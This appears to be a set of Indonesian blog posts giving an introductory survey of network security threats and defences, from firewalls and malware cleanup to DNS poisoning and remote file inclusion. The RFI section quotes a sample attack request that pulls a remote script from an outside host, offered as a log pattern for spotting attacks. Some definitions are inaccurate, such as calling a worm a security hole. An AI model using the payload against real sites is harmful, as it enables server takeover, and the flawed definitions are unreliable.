Firewall adalah sebuah sistem atau perangkat yang mengizinkan lalu lintas jaringan yang dianggap aman untuk melaluinya dan mencegah lalu lintas jaringan yang tidak aman. Umumnya, sebuah firewall diterapkan dalam sebuah mesin terdedikasi, yang berjalan pada gateway antara jaringan lokal dan jaringan lainnya. Firewall umumnya juga digunakan untuk mengontrol akses terhadap siapa saja yang memiliki akses terhadap jaringan pribadi dari pihak luar. Saat ini, istilah firewall menjadi istilah lazim yang merujuk pada sistem yang mengatur komunikasi antar dua jaringan yang berbeda. Mengingat saat ini banyak perusahaan yang memiliki akses ke Internet dan juga tentu saja jaringan berbadan hukum di dalamnya, maka perlindungan terhadap modal digital perusahaan tersebut dari serangan para peretas, pemata-mata, ataupun pencuri data lainnya, menjadi hakikat.

2. Macam-macam ancaman keamanan jaringan :

Ancaman Jaringan Komputer

• FISIK

􀂾 Pencurian perangkat keras komputer atau perangkat jaringan

􀂾 Kerusakan pada komputer dan perangkat komunikasi jaringan

􀂾 Wiretapping

􀂾 Bencana alam

• LOGIK

􀂾 Kerusakan pada sistem operasi atau aplikasi

􀂾 Virus

􀂾 Sniffing

Beberapa Bentuk Ancaman Jaringan

• Sniffer

􀂾 Peralatan yang dapat memonitor proses yang sedang berlangsung

• Spoofing

􀂾 Penggunaan komputer untuk meniru (dengan cara menimpa identitas atau alamat IP.

• Phreaking

􀂾 Perilaku menjadikan sistem pengamanan telepon melemah

• Remote Attack

􀂾 Segala bentuk serangan terhadap suatu mesin dimana penyerangnya tidak memiliki kendali terhadap mesin tersebut karena dilakukan dari jarak jaruh di luar sistem jaringan atau media transmisi.

• Hole

􀂾 Kondisi dari software atau hardware yang bisa diakses oleh pemakai yang tidak memiliki otoritas atau meningkatnya tingkat pengaksesan tanpa melalui proses autorisasi

• Hacker

– Orang yang secara diam-diam mempelajari sistem yang biasanya sukar dimengerti untuk kemudian mengelolanya dan men-share hasil ujicoba yang dilakukannya.

– Hacker tidak merusak system

• Craker

– Orang yang secara diam-diam mempelajari sistem dengan maksud jahat

– Muncul karena sifat dasar manusia yang selalu ingin membangun (salah satunya merusak)

– Ciri-ciri cracker :

§       Bisa membuat program C, C++ atau pearl

§       Memiliki pengetahuan TCP/IP

§        Menggunakan internet lebih dari 50 jam per-bulan

§        Menguasai sistem operasi UNIX atau VMS

§        Suka mengoleksi software atau hardware lama

§        Terhubung ke internet untuk menjalankan aksinya

§       Melakukan aksinya pada malam hari, dengan alasan waktu yang memungkinkan, jalur komunikasi tidak padat, tidak mudah diketahui orang lain

– Penyebab cracker melakukan penyerangan :

    • spite, kecewa, balas dendam

    • sport, petualangan

    • profit, mencari keuntungan dari imbalan orang lain

    • stupidity, mencari perhatian

    • politics, alasan politis

– Ciri-ciri target yang dibobol cracker :

• Sulit ditentukan

• Biasanya organisasi besar dan financial dengan system pengamanan yang canggih

• Bila yang dibobol jaringan kecil biasanya sistem pengamanannya lemah, dan pemiliknya baru dalam bidang internet

– Ciri-ciri target yang “berhasil” dibobol cracker :

• Pengguna bisa mengakses, bisa masuk ke jaringan tanpa “nama” dan “password”

• Pengganggu bisa mengakses, merusak, mengubah atau sejenisnya terhadap data

• Pengganggu bisa mengambil alih kendali sistem

• Sistem hang, gagal bekerja, reboot atau sistem berada dalam kondisi tidak dapat dioperasikan

·        Trojan dalam sistem komputer

Adalah bagian dari infeksi digital yang kehadirannya tidak diharapkan oleh pemilik komputer. Trojan terdiri dari fungsi – fungsi yang tidak diketahui tujuannya, tetapi secara garis besar mempunyai sifat merusak. Trojan masuk ke suatu komputer melalui jaringan dengan cara disisipkan pada saat berinternet dengan media fisik Trojan tidak berpengaruh secara langsung seperti halnya virus komputer, tetapi potensi bahayanya dapat jauh lebih besar dari virus komputer.

Trojan dapat diaktifkan dan dikendalikan secara jarak jauh atau menggunakan timer. Pengendalian jarak jauh seperti halnya Remote Administration Tools, yaitu versi server akan dikendalikan oleh penyerang lewat versi client-nya. Banyak hal yang dapat dilakukan oleh penyerang jika komputer korban telah dikendalikan. Port tertentu yang tidak lazim terbuka mengindikasikan adanya kegiatan aktif Trojan.

Penanganan Trojan dapat dilakukan dengan dua cara, yaitu pencegahan (preventif) atau pengobatan (recovery). Usaha pencegahan dilakukan sebelum terjadinya infeksi, yaitu usaha agar sistem tidak mempunyai lubang keamanan. Usaha pengobatan dilakukan setelah sistem terinfeksi, yaitu usaha untuk menutup lubang keamanan yang telah diekploitasi dan menghilangkan penyebab infeksi.

·        Exploit

Adalah sebuah perangkat lunak (software) yang menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanan komputer menggunakan exploit untuk mendemonstrasikan bahwa suatu sistem memiliki kerapuhan. Ada badan peneliti yang bekerja sama dengan produsen perangkat lunak. Peneliti itu bertugas mencari kerapuhan dari sebuah perangkat lunak dan kalau mereka menemukannya, mereka melaporkan hasil temuan ke produsen agar produsen dapat mengambil tindakan. Meskipun demikian, exploit kadang menjadi bagian dari suatu malware yang bertugas menyerang kerapuhan keamanan.

·        Denial of Service

Adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak / berkepentingan tidak dapat menggunakan layanan tersebut. Serangan Denial of Service (DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood-nya. Perkembangan dari serangan DOS adalah DDOS. Serangan DDoS adalah jenis serangan dengan cara memenuhi trafik server situs tersebut hingga situs menjadi lambat dan susah diakses. Pengertian lain tentang DDOS adalah mengirimkan data secara terus menerus dengan menggunakan satu komputer tidak begitu efektif karena biasanya sumber daya server yang diserang lebih besar dari komputer penyerang.

·        DEFACED

Pengertian sederhana dari deface / defacing atau bahasa umumnya cyber grafity adalah suatu aktivitas yang mengotori atau mencoret – coret / menodai dan merubah inti dari isi halaman suatu website dengan tulisan / kalimat, gambar / image, atau link tertentu yang membuat suatu link menjadi melenceng dari perintah yang kita berikan atau kita buat. Biasanya tujuan pelaku ( biasa disebut hacker) adalah supaya dia mendapat sebuah nama dan menjadi perhatian orang banyak, menjadi perbincangan karena ulah isengnya yang bisa membuat dia merasa sedikit bangga karena telah berhasil menyusup.

·        WORM

Worm adalah lubang keamanan atau celah kelemahan pada komputer kita yang memungkinkan komputer kita terinfeksi virus tanpa harus eksekusi  suatu file yang umumnya terjadi pada jaringan.

Virus komputer adalah suatu program komputer yang menduplikasi atau menggandakan diri dengan menyisipkan kopian atau salinan dirinya ke dalam media penyimpanan / dokumen serta ke dalam jaringan secara diam – diam tanpa sepengetahuan pengguna komputer tersebut. Efek dari virus komputer sangat beragam mulai dari hanya muncul pesan – pesan aneh hingga merusak komputer serta menghapus file atau dokumen kita.

Jika kita melihat kejanggalan pada media penyimpanan seperti file bernama aneh yang tidak pernah kita buat atau file bukan jenis aplikasi tetapi mengaku sebagai aplikasi maka jangan kita klik, kita buka atau kita jalankan agar virus komputer tersebut tidak menular ke komputer yang kita gunakan.

Tanda – tanda komputer kita terkena virus :

§         Komputer berjalan lambat dari normal

§         Perubahan tampilan pada komputer

§         Komputer sering restart sendiri atau crash ketika sedang berjalan

§         Komputer hang atau berhenti merespon kita

§         Harddisk tidak bisa diakses

§         Dan lain – lain.

3. Identifikasi virus, worm, dan trojan

1. Virus

Virus adalah Suatu virus yang bisa memperbanyak dirinya sendiri secara terus menerus.

Cara Kerja Virus :

Suatu program komputer yg menduplikasi atau menggandakan diri dengan menyisipkan kopian atau salinan dirinya ke dalam media penyimpanan serta ke dalam jaringan secara diam-diam tanpa seepengetahuan pengguna komputer tersebut.

Penanganan virus :

1.Jangan panik,usahakan jangan dibawa panik.Ini adalah peraturan yang baik.dan ini bisa menyelamatkan anda dari kehilangan data penting.dan dari kestressan.

2.Disconnect komputer anda dari internet dan jaringan local(LAN),(jika yang terkena hanya 1 komputer)

3.Jika virus telah myebabkan komputer anda tidak bisa booting(komputer menunjukkan pesan eror ketika di nyalakan)Cobalah booting dalam safe mode atau dengan cd emergency)Microsoft Windows yang telah anda buat ketika anda menginstal system operasi di komputer

4.sebelum melakukan yang lain-lain,back up lah data anda,ke media penyimpanan yang dapat dipindahkan(Floppy/diskette,cd/dvd,Flash disk,dll).

5.Installah program Antivirus,jika dikomputer anda belum ada program anti virus

6.update modul program Jika memungkinkan dapatkan updatenya dari komputer yang tidak terinfeksi virus,seperti dari komputer teman Anda atau dari Warnet / tempat bekerja. ini sangat baik menggunakan komputer yang berbeda .sejak anda terhubung ke internet dengan komputer yang telah terinfeksi virus,itu merupakan kesempatan bagi virus untuk mengirimkan data penting kepada "setan" yang ada di depan monitor di seberang ujung jalan sana.atau menyebarkan virus itu sendiri ke alamat email di address book program email client yang anda pakai.

7.Mulai lah melakukan full scan pada komputer anda.

2. Worm

Worm adalah Suatu program komputer yang mampu memperbanyak dirinya, dan menyita memori, secara diam2 tanpa sepengetahuan pengguna komputer tapi tidak mampu melekatkan dirinya pada sebuah program lain.

Cara kerja Worm :

Kemampuannya menyalin-diri, sehingga pc bisa mengirimkan ratusan bahkan ribuan salinan worm, dan menimbulkan suatu kehancuran yang amat besar didalam pc. Atau sebuah program yang berdiri sendiri dan tidak membutuhkan sarang untuk menyebarkan diri. Hebatnya lagi, worm bisa saja tidak memerlukan bantuan orang untuk penyebarannyaSetelah masuk ke dalam suatu komputer, worm memodifikasi beberapa pengaturan di sistem operasi agar tetap hidup. Minimal, ia memasukkan diri dalam proses boot suatu komputer. Lainnya, mungkin mematikan akses ke situs antivirus, menonaktifkan fitur keamanan di sistem dan tindakan lain

Cara penanganan :

1. Putuskan hubungan komputer yang akan dibersihkan dari jaringan.

2. Matikan fitur Autorun pada Drive Anda. Hal ini dilakukan agar virus ini tidak aktif ketika user mengakses ke setiap Drive atau Flash Disk.

3. Matikan proses virus yang aktif di memori. Untuk mematikan proses virus tersebut Anda dapat menggunakan tools pengganti Task Manager seperti Currprocess, kemudian matikan proses dengan nama Notepad.scr dengan icon antivirus AVG.

4. Hapus string registry yang sudah dibuat oleh virus. Untuk mempermudah proses Repair registry dengan menyalin script berikut pada program notepad kemdian simpan dengan nama Repair.inf, jalankan file tersebut dengan cara:

- Klik kanan Repair.inf

- Klik Install

5. Hapus file induk yang sudah dibuat oleh virus dengan terlebih dahulu menampilkan file yang disembunyikan. Kemudian hapus file berikut:

C:\msvbvm60.dll [Disetiap Drive/Flash Disk]

C:\Desktop.ini [Disetiap Drive/Flash Disk]

C:\AVG_update_2007.exe [Disetiap Drive]

C:\AVG 2007.exe [Disetiap Drive/Flash Disk]

C:\Autorun.inf [Disetiap Drive/Flash Disk]

C:\update [Disetiap Drive/Flash Disk

Folder.htt

C:\Windows\msvbvm60.dll

C:\windows\Resources\system.scr

C:\windows\system32

notepad.scr

proposal.scr

6. Tampilkan folder C:\Windows yang disembunyikan oleh virus dengan cara:

- Klik [Start]

- Klik [Run]

- Pada dialog box Run, ketik CMD atau Command kemudian klik tombol "OK"

- Setelah muncul layar "Command Prompt" pastikan kursor berada di root C:\ kemudian ketik perintah berikut: ATTRIB -s -h C:\Windows kemudian tekan "enter"

(dwn/dwn

3. Trojan

Trojan adl Sebuah program yang memiliki kemampuan merusak dan menyamar sebagai aplikasi yang tidak berbahaya. Berbeda dengan virus, Trojan tidak menyalin dirinya sendiri, selain hanya merusak. Salah satu jenis Trojan yang amat jahat adalah sebuah program yang menyatakan akan membersihkan komputer kita dari virus, tetapi sebaliknya malah memasukkan virus kedalam komputer kita.

Cara Kerja Trojan :

program akan mengopikan dirinya sendiri ke suatu lokasi rahasia pada hard disk kita. Dengan tujuan, tentu saja, agar file server sulit untuk ditemukan, Trojan akan mengubah suatu file atau registry Windows, sehingga Trojan akan dapat melakukan pengaktifan dirinya sendiri via fasilitas autostart pada saat Windows diaktifkan. Misalnya Trojan akan mengubah file *.INI atau syaraf registri yang menangani masalah autorun.

Cara penanggulangan virus Trojan dan Worm adalah dengan menggunakan program anti virus. Program anti virus terdapat dua jenis yaitu On-access scanner dan On-Demand Scanner. Beberapa software anti virus yaitu :
• Norton Antivirus
• Mcfee VirusScan Plus
• PC Tools Antivirus
• Windows Live OneCare
• F-Prot Antivirus
• Kapersky
• AVG Antivirus

Cara mencegah virus adalah :
• Membuat orang paham terhadap resiko virus
• Install program antivirus dan update secara reguler
• Selalu gunakan software patch untuk menutup lobang security
• Gunakan firewall
• Selalu backup secara reguler data

Jenis-jenis serangan terhadap keamanan jaringan

Jumat, Agustus 19, 2011 Posted by DENDY JEFRIANA No comments


Diposkan oleh Arief Rachman Hakim On 25 Februari 2011

Buffer Overflows

Beberapa serangan umum Buffer overflow, diantaranya:

a. Buffer overruns pada kebanyakan Web server
Webserver Apache dan IIS memiliki celah keamanan. Worm seperti Code Red (untuk IIS) dan Linux. Slapper (untuk Apache) menjadikan celah keamanan yang lebar.

b. DNS overflow
Beberapa server DNS (BIND) sebelumnya tergolong rentan terhadap overflow. Suatu serangan yang akan memberikan nama DNS sangat panjang. Nama DNS dibatasi hingga 64-byte per subkomponen dan 256 byte secara keseluruhan.

c. Serangan DNS
Server DNS biasanya dijalankan pada mode ‘Trust’ oleh service dan user – maksudnya bahwa server DNS dapat dikompromikan agar melancarkan serangan lebih jauh pada user dan service lainnya. Hal ini menjadikan server DNS merupakan target utama serangan para hacker.



d. Mengelabui cache DNS
Serangan yang umum terhadap server DNS. Sederhananya, bekerja dengan mengirimkan suatu pertanyaan untuk meminta domain yang sesungguhnya (“siapakah www.test.com ini?) dan akan disediakan jawaban yang tentu saja salah (“www.test.com adalah 127.0.01″).


DNS Cache Poisoning

DNS Cache Poisoning merupakan sebuah cara untuk menembus pertahanan dengan cara menyampaikan informasi IP Address yang salah mengenai sebuah host, dengan tujuan untuk mengalihkan lalu lintas paket data dari tujuan yang sebenarnya. Cara ini banyak dipakai untuk menyerang situs-situs e-commerce dan banking yang saat ini bisa dilakukan dengan cara online dengan pengamanan Token. Teknik ini dapat membuat sebuah server palsu tampil identik dengan dengan server online banking yang asli. Oleh karena itu diperlukan digital cerficate untuk mengamankannya, agar server palsu tidak dapat menangkap data otentifikasi dari nasabah yang mengaksesnya. Jadi dapat disimpulkan cara kerja DNS (Domain Name System) poisoning ini adalah dengan mengacaukan DNS Server asli agar pengguna Internet terkelabui untuk mengakses web site palsu yang dibuat benar-benar menyerupai aslinya tersebut, agar data dapat masuk ke server palsu.

DNS Poisoning sendiri dahulu pertama kali ditunjukkan tahun 1997 oleh Eugene Kashpureff dengan cara mengalihkan request ke host InterNIC menuju ke situs pendaftaran domain name alternatif, AlterNIC. Request berhasil dialihkan dengan cara mengeksploitasi vulnerability pada DNS Service. Pada waktu Name Server menerima jawaban DNS Query, sumber jawaban ini membiarkan informasi yang tidak ditanyakan. Dengan begitu Kashpureff dapat memasukkan informasi DNS palsu pada jawaban yang sebenarnya tersebut.

Name server yang menerima jawaban tersebut akan langsung menerima jawaban tersebut dan menyimpan informasi apapun yang didapatkannya dalam cache-nya. Hal ini mengakibatkan apabila user mencoba me-resolve suatu host dalam domain InterNIC, maka ia akan menerima informasi IP Address dari AlterNIC. Dengan kata lain ia sudah dialihkan ke alamat palsu.

Remote File Inclusion (RFI

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion
biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi.

File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya(Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, dll..)
5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan ddos.

Hal yang bisa dilakukan untuk menghindari dari serangan ini adalah :

Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga,
karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

IP SPOOFING

IP spoofing adalah sejumlah serangan yang menggunakan perubahan sumber IP Address. Protokol TCP/IP tidak memiliki cara untuk memeriksa apakah sumber IP address dalam paket header benar-benar milik mesin yang mengirimkannya. Kemampuan ini sering dimanfaatkan oleh para hacker untuk melancarkan serangan seperti:

a. SMURF Attack
Suatu Broadcast ping yang terkirim dan sumber IP dari ping terlihat sama dengan IP address korban. Dalam kasus ini sejmlah besar komputer akan merespon balik dan mengirim suatu Ping reply ke korban. Kejadiannya terus berulang-kali, hingga mesin korban atau link mengalami overload dan dalam kondisi Denial of Service.

b. Prediksi jumlah rangkaian TCP
Suatu koneksi TCP yang ditandai dengan suatu jumlah rangkaian client dan server. Jika jumlah rangkaian tersebut dapat ditebak, para hacker dapat membuat packet dengan memalsukan IP address dan menebak urutan jumlah untuk melakukan hijack koneksi TCP.

c. Prediksi rangkaian melalui pemalsuan DNS
Server DNS biasanya mengquery server DNS lain untuk mengetahui nama host yang lain. Seorang hacker akan mengirimkan suatu request ke server DNS target seolah-olah seperti respon ke server yang sama. Dengan cara ini para hacker dapat membuat client yang mengakses, misalnya situs www.hotmail.com ke server milik sang hacker.

KEAMANAN JARINGAN

Jumat, Agustus 19, 2011 Posted by DENDY JEFRIANA No comments

1.   Apa itu Keamanan Jaringan

Satu hal yang perlu diingat bahwa tidak ada jaringan yang anti sadap atau tidak ada jaringan komputer yang benar-benar aman. Sifat dari jaringan adalah melakukan komunikasi. Setiap komunikasi dapat jatuh ke tangan orang lain dan disalahgunakan. Sistem keamanan membantu mengamankan jaringan tanpa menghalangi penggunaannya dan menempatkan antisipasi ketika jaringan berhasil ditembus. Selain itu, pastikan bahwa user dalam jaringan memiliki pengetahuan yang cukup mengenai keamanan dan pastikan bahwa mereka menerima dan memahami rencana keamanan yang Anda buat. Jika mereka tidak memahami hal tersebut, maka mereka akan menciptakan  lubang (hole) keamanan pada jaringan Anda.      

Ada dua elemen utama pembentuk keamanan jaringan :

·       Tembok pengamanan, baik secara fisik maupun maya, yang ditaruh diantara piranti dan layanan jaringan yang digunakan dan orang-orang yang akan berbuat jahat.

·       Rencana pengamanan, yang akan diimplementasikan bersama dengan user lainnya, untuk menjaga agar sistem tidak bisa ditembus dari luar.

        

Segi-segi keamanan didefinisikan dari kelima point ini.

a.        Confidentiality Mensyaratkan bahwa informasi (data) hanya bisa diakses oleh pihak yang memiliki wewenang.

b.        Integrity Mensyaratkan bahwa informasi hanya dapat diubah oleh pihak yang memiliki wewenang.

c.         Availability Mensyaratkan bahwa informasi tersedia untuk pihak yang memiliki wewenang ketika dibutuhkan.

d.        Authentication Mensyaratkan bahwa pengirim suatu informasi dapat diidentifikasi dengan benar dan ada jaminan bahwa identitas yang didapat tidak palsu.

e.         Nonrepudiation Mensyaratkan bahwa baik pengirim maupun penerima informasi tidak dapat menyangkal pengiriman dan penerimaan pesan.

Serangan (gangguan) terhadap keamanan dapat dikategorikan dalam empat kategori utama :

a. Interruption

Suatu aset dari suatu sistem diserang sehingga menjadi tidak tersedia atau tidak dapat dipakai oleh yang berwenang. Contohnya adalah perusakan/modifikasi terhadap piranti keras atau saluran jaringan.

b. Interception

Suatu pihak yang tidak berwenang mendapatkan akses pada suatu aset. Pihak yang dimaksud bisa berupa  orang, program, atau sistem yang lain. Contohnya adalah penyadapan terhadap data dalam suatu jaringan.

c. Modification

Suatu pihak yang tidak berwenang dapat melakukan perubahan terhadap suatu aset. Contohnya adalah perubahan nilai pada file data, modifikasi program sehingga berjalan dengan tidak semestinya, dan  modifikasi pesan yang sedang ditransmisikan dalam jaringan.

d. Fabrication

Suatu pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem.

Contohnya adalah pengiriman pesan palsu kepada orang lain.

Ada beberapa prinsip yang perlu dihindari dalam menangani masalah keamanan :

§       diam dan semua akan baik-baik saja

§       sembunyi dan mereka tidak akan dapat menemukan anda

§       teknologi yang digunakan kompleks/rumit, artinya aman

2.   Kepedulian Masalah Jaringan

Overview

Pendefinisian keamanan (pada jaringan komputer) dapat dilakukan dengan melihat target yang ingin dicapai melalui konsep 'aman'. Berikut adalah daftar fitur

 yang dapat mencegah/mengantisipasi serangan dari pihak luar ataupun pihak dalam.

Security Policy

Sebelum melanjutkan implementasi ke tingkat yang lebih jauh sebaiknya ditentukan dulu apa yang hendak dilindungi dan dilindungi dari siapa. Beberapa pertanyaan berikut dapat membantu penentuan kebijakan keamanan yang diambil.

1.    Informasi apa yang dianggap rahasia atau sensitif ?

2.    Anda melindungi sistem anda dari siapa ?

3.    Apakah anda membutuhkan akses jarak jauh?

4.    Apakah password dan enkripsi cukup melindungi ?

5.    Apakah anda butuh akses internet?

6.    Tindakan apa yang anda lakukan jika ternyata sistem anda dibobol?

Serta masih banyak pertanyaan lain tergantung bentuk organisasi yang anda kelola.

Kebijaksanaan keamanan  tergantung sebesar apa anda percaya orang lain, di dalam ataupun di luar organisasi anda. Kebijakan haruslah merupakan keseimbangan antara mengijinkan user untuk mengakses informasi yang dibutuhkan dengan tetap menjaga keamanan sistem.

Keamanan Secara Fisik

Fisik dalam bagian ini diartikan sebagai situasi di mana seseorang dapat masuk ke dalam ruangan  server/jaringan dan dapat mengakses piranti tersebut secara illegal. Orang yang tidak berkepentingan ini bisa saja seorang tamu, staf pembersih, kurir pengantar paket, dan lainnya yang dapat masuk ke ruangan tersebut dan mengutak-atik piranti yang ada. Apabila seseorang memiliki akses terhadap ruangan tersebut, orang  tersebut bisa saja memasang program trojan horse di komputer, melakukan booting dari floppy disk, atau  mencuri data-data penting (seperti file password) dan membongkarnya di tempat yang lebih aman.

Untuk  menjaga keamanan, taruhlah server di ruangan yang dapat dikunci dan pastikan bahwa ruangan tersebut  dikunci dengan baik. Untuk menghindari pengintaian, gunakan screen-saver yang dapat dipassword. Atur  juga semua komputer untuk melakukan fungsi auto-logout setelah tidak aktif dalam jangka waktu tertentu.

BIOS Security

Sebenarnya seorang  admin direkomendasikan men-disable boot dari floppy. Atau bisa dilakukan dengan membuat password pada BIOS dan memasang boot password.

Password Attack

Banyak orang menyimpan informasi pentingnya pada komputer dan seringkali sebuah password hal yang mencegah orang lain untuk melihatnya. Untuk menghindari serangan password maka sebaiknya user menggunakan password yang cukup baik. Petunjuk pemilihan password :

·       Semua password harus terdiri dari paling sedikit 7 karakter.

·       Masukkan kombinasi huruf, angka, dan tanda baca sebanyak mungkin dengan catatan bahwa password  tetap mudah untuk diingat. Salah satu caranya adalah mengkombinasikan kata-kata acak dengan tanda baca  atau dengan mengkombinasikan kata-kata dengan angka. Contoh : rasa#melon@manis, komputer0digital1, kurang<lebih>2001

·       Gunakan huruf pertama frasa yang gampang diingat. Contoh: dilarang parkir antara pukul 7 pagi hingga pukul 8 sore à dpap7php8s, tidak ada sistem yang benar-benar aman dalam konteks jaringan à tasybbadkj

·       Gunakan angka atau tanda baca untuk menggantikan huruf di password. Contoh : keberhasilan à k3b3rh45!l4n

·       Gantilah password secara teratur

Malicious Code

Malicious code bisa berupa virus, trojan atau worm, biasanya berupa kode instruksi yang akan memberatkan sistem sehingga performansi sistem menurun. Cara mengantisipasinya bisa dilihat pada 6 contoh berikut :

1.    berikan kesadaran pada user tentang ancaman virus.

2.    gunakan program anti virus yang baik pada workstation, server dan gateway internet (jika punya).

3.    ajarkan dan latih user cara menggunakan program anti virus

4.    sebagai admin sebaiknya selalu mengupdate program anti-virus dan database virus

5.    Biasakan para user untuk TIDAK membuka file attachment email atau file apapun dari floppy sebelum 110 % yakin atau tidak attachment/file tsb “bersih”.

6.    Pastikan kebijakan kemanan anda up to date.

Sniffer

Sniffer adalah sebuah device penyadapan komunikasi jaringan komputer dengan memanfaatkan mode premicious pada ethernet. Karena jaringan komunikasi komputer terdiri dari data biner acak maka sniffer ini biasanya memiliki penganalisis protokol sehingga data biner acak dapat dipecahkan. Fungsi sniffer bagi pengelola bisa untuk pemeliharaan jaringan, bagi orang luar bisa untuk menjebol sistem.

        Cara paling mudah untuk mengantisipasi Sniffer adalah menggunakan aplikasi yang secure, misal : ssh, ssl, secureftp dan lain-lain

Scanner

Layanan jaringan (network service) yang berbeda berjalan pada port yang berbeda juga. Tiap layanan jaringan berjalan pada alamat jaringan tertentu (mis. 167.205.48.130) dan mendengarkan (listening) pada satu atau lebih port (antara 0 hingga 65535). Keduanya membentuk apa yang dinamakan socket  address yang mengidentifikasikan secara unik suatu layanan dalam jaringan. Port 0 hingga 1023 yang paling umum dipergunakan didefinisikan sebagai well-known number dalam konvensi UNIX dan dideskripsikan dalam RFC 1700.

        Port Scanner merupakan program yang didesain untuk menemukan layanan (service) apa saja yang dijalankan pada host jaringan. Untuk mendapatkan akses ke host, cracker harus mengetahui titik-titik kelemahan yang ada. Sebagai contoh, apabila cracker sudah mengetahui bahwa host menjalankan proses ftp server, ia dapat menggunakan kelemahan-kelemahan yang ada pada ftp server untuk mendapatkan akses. Dari bagian ini kita dapat mengambil kesimpulan bahwa layanan yang tidak benar-benar diperlukan sebaiknya dihilangkan untuk memperkecil resiko keamanan yang mungkin terjadi.

        Mirip dengan port scanner pada bagian sebelumnya, network scanner memberikan informasi mengenai sasaran yang dituju, misalnya saja sistem operasi yang dipergunakan, layanan jaringan yang aktif, jenis mesin yang terhubung ke network, serta konfigurasi jaringan. Terkadang, network scanner juga mengintegrasikan port scanner dalam aplikasinya. Tool ini berguna untuk mencari informasi mengenai target sebanyak mungkin sebelum melakukan serangan yang sebenarnya. Dengan mengetahui kondisi dan konfigurasi jaringan, seseorang akan lebih mudah masuk dan merusak sistem.

        Contoh scanner : Nmap, Netcat, NetScan Tools Pro 2000, SuperScan

Spoofing

Spoofing (penyamaran) biasa dilakukan oleh pihak yang tidak bertanggungjawab untuk menggunakan fasilitas dan resource sistem. Spoofing adalah teknik melakukan penyamaran sehingga terdeteksi sebagai identitas yang bukan sebenarnya, misal : menyamar sebagai IP tertentu, nama komputer bahkan e-mail address tertentu. Antisipasinya dapat dilakukan dengan menggunakan aplikasi firewall.

Denial of Service

Denial of Service (DoS) merupakan serangan dimana suatu pihak mengekploitasi aspek dari suite Internet Protocol untuk menghalangi akses pihak yang berhak atas informasi atau sistem yang diserang.  Hole yang memungkinkan DoS berada dalam kategori C, yang berada dalam prioritas rendah. Serangan ini  biasanya didasarkan pada sistem operasi yang dipergunakan. Artinya, hole ini berada di dalam bagian  jaringan dari sistem operasi itu sendiri. Ketika hole macam ini muncul, hole ini harus diperbaiki oleh  pemilik software tersebut atau di-patch oleh vendor yang mengeluarkan sistem operasi tersebut. Contoh dari serangan ini adalah TCP SYN dimana permintaan koneksi jaringan dikirimkan ke server dalam jumlah yang sangat besar. Akibatnya server dibanjiri permintaan koneksi dan menjadi lambat atau bahkan tidak dapat dicapai sama sekali. Hole ini terdapat nyaris di semua sistem operasi yang menjalankan TCP/IP  untuk berkomunikasi di internet. Hal ini tampaknya menjadi masalah yang terdapat di dalam desain suite  TCP/IP, dan merupakan sesuatu yang tidak mudah diselesaikan.

Dalam serangan DoS, sesorang dapat melakukan sesuatu yang mengganggu kinerja dan operasi jaringan atau server. Akibat dari serangan ini adalah lambatnya server atau jaringan dalam merespons, atau bahkan bisa menyebabkan crash. Serangan DoS mengganggu user yang sah untuk mendapatkan layanan yang sah, namun tidak memungkinkan cracker masuk ke dalam sistem jaringan yang ada. Namun, serangan semacam ini terhadap server yang menangani kegiatan e-commerce akan dapat berakibat kerugian dalam bentuk  finansial.

3.   Enkripsi Untuk Keamanan Data Pada Jaringan

Salah satu hal yang penting dalam komunikasi menggunakan computer untuk menjamin kerahasian data adalah enkripsi. Enkripsi dalah sebuah proses yang melakukan perubahan sebuah kode dari yang bisa dimengerti menjadi sebuah kode yang tidak bisa dimengerti (tidak terbaca). Enkripsi dapat diartikan sebagai kode atau chiper. Sebuah sistem pengkodean menggunakan suatu table atau kamus yang telah didefinisikan untuk mengganti kata dari informasi atau yang merupakan bagian dari informasi yang dikirim. Sebuah chiper menggunakan suatu algoritma yang dapat mengkodekan semua aliran data (stream) bit dari sebuah pesan menjadi cryptogram yang tidak dimengerti (unitelligible). Karena teknik cipher merupakan suatu sistem yang telah siap untuk di automasi, maka teknik ini digunakan dalam sistem keamanan komputer dan network.

